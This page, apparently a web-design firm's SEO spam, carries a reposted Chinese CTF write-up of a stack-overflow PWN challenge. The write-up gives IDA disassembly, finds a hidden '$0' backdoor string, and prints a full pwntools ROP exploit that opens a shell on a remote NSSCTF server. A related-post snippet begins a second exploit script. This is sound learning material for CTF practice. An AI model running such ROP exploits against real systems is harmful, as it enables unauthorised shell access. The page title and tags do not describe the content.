延边朝鲜族自治州网站建设_网站建设公司_云服务器_seo优化

首页 / 建站日记 / 延边朝鲜族自治州网站建设_网站建设公司_云服务器_seo优化
延边朝鲜族自治州网站建设_网站建设公司_云服务器_seo优化
2025/12/17 23:34:02 网站建设 项目流程

第一次打CTF——PWN篇学习笔记16

在ida中看一看,发现可疑地址

int __fastcall main(int argc, const char **argv, const char **envp) { _BYTE buf[16]; // [rsp+0h] [rbp-10h] BYREF ​ system("echo 'zltt lost his shell, can you find it?'"); read(0, buf, 0x38u); return 0; } __int64 tips() { return MEMORY[0x403569](); }

看了其他师傅的wp,发现这是一个后门函数,在ida中Options-General-Disassembly-Number of opcode bytes改成10即可发现24 30($0)可用于获得shell

.text:0000000000400537 tips proc near .text:0000000000400537 ; __unwind { .text:0000000000400537 55 push rbp .text:0000000000400538 48 89 E5 mov rbp, rsp .text:000000000040053B B8 00 00 00 00 mov eax, 0 .text:0000000000400540 E8 24 30 00 00 call near ptr 403569h .text:0000000000400545 90 nop .text:0000000000400546 5D pop rbp .text:0000000000400547 C3 retn .text:0000000000400547 ; } // starts at 400537 .text:0000000000400547 tips endp
.text:0000000000400548 ; int __fastcall main(int argc, const char **argv, const char **envp) .text:0000000000400548 public main .text:0000000000400548 main proc near ; DATA XREF: _start+1D↑o .text:0000000000400548 .text:0000000000400548 buf = byte ptr -10h .text:0000000000400548 .text:0000000000400548 ; __unwind { .text:0000000000400548 push rbp .text:0000000000400549 mov rbp, rsp .text:000000000040054C sub rsp, 10h .text:0000000000400550 lea rdi, command ; "echo 'zltt lost his shell, can you find"... .text:0000000000400557 call _system .text:000000000040055C lea rax, [rbp+buf] .text:0000000000400560 mov edx, 38h ; '8' ; nbytes .text:0000000000400565 mov rsi, rax ; buf .text:0000000000400568 mov edi, 0 ; fd .text:000000000040056D mov eax, 0 .text:0000000000400572 call _read .text:0000000000400577 mov eax, 0 .text:000000000040057C leave .text:000000000040057D retn .text:000000000040057D ; } // starts at 400548 .text:000000000040057D main endp

取system地址0x400557,据此编写脚本,成功得到flag

from pwn import * import struct ​ context.arch = 'amd64' context.os = 'linux' ​ #io = process('./pwn') io = remote("node4.anna.nssctf.cn",28152) ​ pop_rdi = 0x4005e3 system = 0x400557 backdoor = 0x400540 + 1 ​ payload = cyclic(0x10 + 8) + p64(pop_rdi) + p64(backdoor) + p64(system) ​ io.sendline(payload) ​ io.interactive()
标签: 网站建设 企业官网 项目流程 UI设计 前端开发

热门文章

文章分类

标签云

网站建设 响应式设计 用户体验 SEO优化 前端开发 小程序 电商平台 性能优化

相关文章

您可能感兴趣的其他内容

[NSSCTF 2022 Spring Recruit]R3m4ke?
2025/12/17 23:34:02 网站建设

[NSSCTF 2022 Spring Recruit]R3m4ke?

第一次打CTF——PWN篇学习笔记15很简单的栈溢出,没有任何心机,注意地址取push之后的使程序八字节对齐即可from pwn import * import struct ​ context.arch i386 context.os linux ​ #io process(./pwn) io remote("node4.anna.nssctf.cn&quo…...

阅读更多 →
域名被污染是什么意思?还能不能继续使用?
2025/12/17 23:34:01 网站建设

域名被污染是什么意思?还能不能继续使用?

在日常域名管理和使用过程中,不少人会遇到“域名被污染”的情况。那么,域名被污染到底是什么意思?还能否继续使用呢?一、什么是域名被污染域名被污染,通常指的是域名的解析或访问受到干扰,导致用户无法正常…...

阅读更多 →
内存金字塔:Ascend C中的多级存储体系与高效访存设计
2025/12/17 23:34:01 网站建设

内存金字塔:Ascend C中的多级存储体系与高效访存设计

目录 🎯 摘要 1. 🏗️ 技术原理:内存金字塔的架构哲学 1.1 达芬奇架构的内存层次设计 1.2 Unified Buffer的硬件级秘密 1.3 访存延迟的数学模型 2. ⚡ 实战部分:从理论到代码的跨越 2.1 基础数据搬运优化实战 2.1.1 DMA指…...

阅读更多 →

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询